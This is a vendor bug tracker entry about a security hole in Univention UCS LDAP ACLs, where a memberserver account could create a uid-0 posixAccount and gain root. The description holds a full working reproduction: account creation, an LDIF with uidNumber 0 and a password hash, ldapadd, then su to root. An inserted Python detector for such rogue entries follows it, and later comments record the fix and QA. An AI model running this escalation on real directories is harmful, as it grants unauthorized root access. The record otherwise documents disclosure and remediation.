Bug 41723 - univention-virtual-machine-manager-schema - take over complete domain as memberserver
Status: CLOSED FIXED
Product: UCS
Classification: Unclassified
Component: Virtualization - UVMM
Version: UCS 4.1
Hardware: Other Linux
Importance: P5 critical
Target Milestone: UCS 4.1-2-errata
Assigned To: Florian Best
QA Contact: Stefan Gohmann
Depends on: 41715 41797
Blocks:
Reported: 2016-07-04 14:38 CEST by Florian Best
Modified: 2021-06-23 07:29 CEST (History)
What kind of report is it?: Security Issue
Bug group (optional): Security
Description Florian Best univentionstaff 2016-07-04 14:38:30 CEST
The ACL rules in the package univention-virtual-machine-manager-schema have to be adjusted.

+++ This bug was initially created as a clone of Bug #41715 +++

Preconditions: Having a memberserver/slave/master/backup or any object underneath cn=memberserver,cn=computers,$ldap_base / cn=dc,cn=computers,$ldap_base.

root@xen3:~# eval "$(ucr shell)"
root@xen3:~# udm container/cn create --set name=memberserver --position "cn=computers,$ldap_base"
Object created: cn=memberserver,cn=computers,dc=school,dc=local
root@xen3:~# eval "$(ucr shell)"; udm computers/memberserver create --set name=hacker --position="cn=memberserver,cn=computers,$ldap_base" --set password=univention
Object created: cn=hacker,cn=memberserver,cn=computers,dc=school,dc=local

# now PWN it
$ cat posix_account.ldif
dn: univentionAppID=foobar,cn=samba4,cn=apps,cn=univention,dc=school,dc=local
univentionAppID: foobar
objectClass: univentionApp
objectClass: posixAccount
uid: hacker
cn: hacker
uidNumber: 0
gidNumber: 0
homeDirectory: /root
loginShell: /bin/bash
userPassword:: e2NyeXB0fSQ2JEguMDVWRC9EdVBueUlvTkMkeUlKd1lCWk5XVTRma0NWOFNFMHFpUDd5REIzSVFXbkZQUjA4VWkuTUtjSFFCWnZ5N09JbVUyYXZiMjJHVFlHbHpCZzRGanR0TVlDVXo4RldTcDBKbC8=
$ ldapadd -D cn=hacker,cn=memberserver,cn=computers,dc=school,dc=local -w univention < posix_account.ldif
adding new entry "univentionAppID=foobar,cn=samba4,cn=apps,cn=univention,dc=school,dc=local"
$ su hacker
Passwort: 
hacker@xen3:~# id
uid=0(hacker) gid=0(root) Gruppen=0(root)
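A defender-side check for the condition reproduced above, added here as an example and not taken from the bug report or the UCS code base: it reads LDIF and flags posixAccount entries that carry uid/gid 0 or sit outside the expected account container, which is exactly the shape of the entry planted under cn=apps. It assumes cn=users is the only legitimate account container (adjust per deployment); the sample LDIF is constructed.

```python
import base64

# Constructed sample LDIF: one normal account and one entry shaped like the planted posixAccount.
SAMPLE_LDIF = """\
dn: uid=alice,cn=users,dc=school,dc=local
objectClass: posixAccount
uidNumber: 2001
gidNumber: 5001

dn: univentionAppID=foobar,cn=samba4,cn=apps,cn=univention,dc=school,dc=local
objectClass: univentionApp
objectClass: posixAccount
uidNumber: 0
gidNumber: 0
userPassword:: e2NyeXB0fXg=
"""

def parse_ldif(text):
    """Minimal LDIF reader -> [(dn, {attr: [values]})]; decodes '::' base64 values."""
    entries = []
    for record in text.strip().split("\n\n"):
        dn, attrs = None, {}
        for line in record.splitlines():
            name, _, value = line.partition(":")
            if value.startswith(":"):  # 'attr:: <base64>' form, as used for userPassword
                value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
            name, value = name.strip().lower(), value.strip()
            if name == "dn":
                dn = value
            else:
                attrs.setdefault(name, []).append(value)
        entries.append((dn, attrs))
    return entries

def find_rogue_posix_accounts(entries, user_containers=("cn=users",)):
    """Flag posixAccount entries with uid/gid 0 or outside the assumed account containers."""
    findings = []
    for dn, attrs in entries:
        classes = {c.lower() for c in attrs.get("objectclass", [])}
        if "posixaccount" not in classes:
            continue
        reasons = []
        if "0" in attrs.get("uidnumber", []) + attrs.get("gidnumber", []):
            reasons.append("uid/gid 0")
        rdns = [r.strip().lower() for r in dn.split(",")]
        if not any(c in rdns for c in user_containers):
            reasons.append("outside user container")
        if reasons:
            findings.append((dn, reasons))
    return findings
```

Run it against an `ldapsearch -LLL '(objectClass=posixAccount)'` dump to audit an existing directory; any hit under cn=apps or cn=computers deserves a look at the ACLs that allowed its creation.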
Comment 1 Florian Best univentionstaff 2016-07-04 19:57:49 CEST
univention-virtual-machine-manager-schema.yaml:
r70818 | YAML Bug #41723

univention-virtual-machine-manager-schema (6.0.1-2):
r70815 | Bug #41723: uniupdatecopyright
r70814 | Bug #41723: restrict access to UVMM object classes for memberservers and domaincontrollers
Comment 2 Daniel Tröder univentionstaff 2016-07-05 10:14:43 CEST
Crashes my update and leaves system without a working LDAP server:

univention-virtual-machine-manager-schema (6.0.1-2.75.201607041950) wird eingerichtet ...
Neue Version der Konfigurationsdatei /etc/univention/templates/files/etc/ldap/slapd.conf.d/66univention-ldap-server_acl-master-uvmm wird installiert ...
Multifile: /etc/ldap/slapd.conf
Restarting ldap server(s).
Stopping ldap server(s): slapd ...done.
Starting ldap server(s): slapd ...DITContentRuleDescription = "(" whsp
numericoid whsp ; StructuralObjectClass identifier
[ "NAME" qdescrs ]
[ "DESC" qdstring ]
[ "OBSOLETE" whsp ]
[ "AUX" oids ] ; Auxiliary ObjectClasses
[ "MUST" oids ] ; AttributeTypes
[ "MAY" oids ] ; AttributeTypes
[ "NOT" oids ] ; AttributeTypes
whsp ")"
failed.
577a88dc /usr/share/univention-ldap/schema/univention-virtual-machine-manager.schema: line 270 ditcontentrule: Unexpected token before ) DITContentRuleDescription = "(" whsp numericoid whsp ; StructuralObjectClass identifier [ "NAME" qdescrs ] [ "DESC" qdstring ] [ "OBSOLETE" whsp ] [ "AUX" oids ] ; Auxiliary ObjectClasses [ "MUST" oids ] ; AttributeTypes [ "MAY" oids ] ; AttributeTypes [ "NOT" oids ] ; AttributeTypes whsp ")" slapschema: bad configuration file!.
2016-07-04 18:03:40.443670527+02:00 (in joinscript_init)
ucs-school-ldap-acls-master (14.0.1-7.76.201607041949) wird eingerichtet ...
2016-07-04 18:03:40.841997337+02:00 (in joinscript_init)
Traceback (most recent call last):
File "/usr/share/univention-directory-manager-tools/univention-cli-server", line 222, in doit
output = univention.admincli.admin.doit(arglist)
File "/usr/lib/pymodules/python2.7/univention/admincli/admin.py", line 395, in doit
out=_doit(arglist)
File "/usr/lib/pymodules/python2.7/univention/admincli/admin.py", line 522, in _doit
co=univention.admin.config.config(configRegistry['ldap/master'])
File "/usr/lib/pymodules/python2.7/univention/admin/config.py", line 38, in __init__
base=univention.admin.uldap.getBaseDN(host)
File "/usr/lib/pymodules/python2.7/univention/admin/uldap.py", line 68, in getBaseDN
result = l.search_s('', ldap.SCOPE_BASE, 'objectClass=*', ['NamingContexts'])
File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 559, in search_s
return self.search_ext_s(base,scope,filterstr,attrlist,attrsonly,None,None,timeout=self.timeout)
File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 918, in search_ext_s
return self._apply_method_s(SimpleLDAPObject.search_ext_s,*args,**kwargs)
File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 865, in _apply_method_s
self.reconnect(self._uri,retry_max=self._retry_max,retry_delay=self._retry_delay)
File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 839, in reconnect
raise e
SERVER_DOWN: {'desc': "Can't contact LDAP server"}
Comment 3 Florian Best univentionstaff 2016-07-05 10:41:42 CEST
univention-virtual-machine-manager-schema (6.0.1-3):
r70824 | Bug #41723: fix syntax error in LDAP schema
Comment 4 Stefan Gohmann univentionstaff 2016-07-12 09:37:20 CEST
YAML: OK

Code review: OK
 r70814: OK
 r70815: OK
 r70824: OK

Tests: OK
  KVM: OK
  EC2: OK
  OpenStack: OK
Comment 5 Florian Best univentionstaff 2016-07-12 10:01:06 CEST
I just saw a DC backup which couldn't join because the schema wasn't installed.

57849f5f /etc/ldap/slapd.conf: line 166: unknown attr "@univentionVirtualMachine" in to clause 57849f5f <access clause> ::= access to <what> [ by <who> [ <access> ] [ <control> ] ]+ <what> ::= bin boot dev etc home initrd.img initrd.img.install initrd.img.old lib lib64 lost+found media mnt opt proc root run sbin selinux srv sys tmp usr var vmlinuz vmlinuz.install vmlinuz.old | dn[.<dnstyle>=<DN>] [filter=<filter>] [attrs=<attrspec>] <attrspec> ::= <attrname> [val[/<matchingRule>][.<attrstyle>]=<value>] | <attrlist> <attrlist> ::= <attr> [ , <attrlist> ] <attr> ::= <attrname> | @<objectClass> | !<objectClass> | entry | children <who> ::= [ bin boot dev etc home initrd.img initrd.img.install initrd.img.old lib lib64 lost+found media mnt opt proc root run sbin selinux srv sys tmp usr var vmlinuz vmlinuz.install vmlinuz.old | anonymous | users | self | dn[.<dnstyle>]=<DN> ] [ realanonymous | realusers | realself | realdn[.<dnstyle>]=<DN> ] [dnattr=<attrname>] [realdnattr=<attrname>] [group[/<objectclass>[/<attrname>]][.<style>]=<group>] [peername[.<peernamestyle>]=<peer>] [sockname[.<style>]=<name>] [domain[.<domainstyle>]=<domain>] [sockurl[.<style>]=<url>] [dynacl/<name>[/<options>][.<dynstyle>][=<pattern>]] [ssf=<n>] [transport_ssf=<n>] [tls_ssf=<n>] [sasl_ssf=<n>] <style> ::= exact | regex | base(Object) <dnstyle> ::= base(Object) | one(level) | sub(tree) | children | exact | regex <attrstyle> ::= exact | regex | base(Object) | one(level) | sub(tree) | children <peernamestyle> ::= exact | regex | ip | ipv6 | path <domainstyle> ::= exact | regex | base(Object) | sub(tree) <access> ::= [[real]self]{<level>|<priv>} <level> ::= none|disclose|auth|compare|search|read|{write|add|delete}|manage <priv> ::= {=|+|-}{0|d|x|c|s|r|{w|a|z}|m}+ <control> ::= [ stop | continue | break ] dynacl: <name>=ACI <pattern>=<attrname> slapschema: bad configuration file!.
Comment 6 Florian Best univentionstaff 2016-07-12 12:35:47 CEST
(In reply to Florian Best from comment #5)
> I just saw a DC backup which couldn't join because the schema wasn't
> installed.
The join seems to have succeeded.
Comment 7 Stefan Gohmann univentionstaff 2016-07-12 16:15:19 CEST
(In reply to Florian Best from comment #5)
> I just saw a DC backup which couldn't join because the schema wasn't
> installed.
> 
> 57849f5f /etc/ldap/slapd.conf: line 166: unknown attr
> "@univentionVirtualMachine" in to clause 57849f5f <access clause> ::= access
> to <what> [ by <who> [ <access> ] [ <control> ] ]+ <what> ::= bin boot dev
> etc home initrd.img initrd.img.install initrd.img.old lib lib64 lost+found
> media mnt opt proc root run sbin selinux srv sys tmp usr var vmlinuz
> vmlinuz.install vmlinuz.old | dn[.<dnstyle>=<DN>] [filter=<filter>]
> [attrs=<attrspec>] <attrspec> ::= <attrname>
> [val[/<matchingRule>][.<attrstyle>]=<value>] | <attrlist> <attrlist> ::=
> <attr> [ , <attrlist> ] <attr> ::= <attrname> | @<objectClass> |
> !<objectClass> | entry | children <who> ::= [ bin boot dev etc home
> initrd.img initrd.img.install initrd.img.old lib lib64 lost+found media mnt
> opt proc root run sbin selinux srv sys tmp usr var vmlinuz vmlinuz.install
> vmlinuz.old | anonymous | users | self | dn[.<dnstyle>]=<DN> ] [
> realanonymous | realusers | realself | realdn[.<dnstyle>]=<DN> ]
> [dnattr=<attrname>] [realdnattr=<attrname>]
> [group[/<objectclass>[/<attrname>]][.<style>]=<group>]
> [peername[.<peernamestyle>]=<peer>] [sockname[.<style>]=<name>]
> [domain[.<domainstyle>]=<domain>] [sockurl[.<style>]=<url>]
> [dynacl/<name>[/<options>][.<dynstyle>][=<pattern>]] [ssf=<n>]
> [transport_ssf=<n>] [tls_ssf=<n>] [sasl_ssf=<n>] <style> ::= exact | regex |
> base(Object) <dnstyle> ::= base(Object) | one(level) | sub(tree) | children
> | exact | regex <attrstyle> ::= exact | regex | base(Object) | one(level) |
> sub(tree) | children <peernamestyle> ::= exact | regex | ip | ipv6 | path
> <domainstyle> ::= exact | regex | base(Object) | sub(tree) <access> ::=
> [[real]self]{<level>|<priv>} <level> ::=
> none|disclose|auth|compare|search|read|{write|add|delete}|manage <priv> ::=
> {=|+|-}{0|d|x|c|s|r|{w|a|z}|m}+ <control> ::= [ stop | continue | break ]
> dynacl: <name>=ACI <pattern>=<attrname> slapschema: bad configuration file!.

I've split it into Bug #41782.

(In reply to Florian Best from comment #6)
> (In reply to Florian Best from comment #5)
> > I just saw a DC backup which couldn't join because the schema wasn't
> > installed.
> The join seems to have succeeded.

Verified.
Comment 8 Janek Walkenhorst univentionstaff 2016-07-21 15:16:22 CEST
<http://errata.software-univention.de/ucs/4.1/214.html>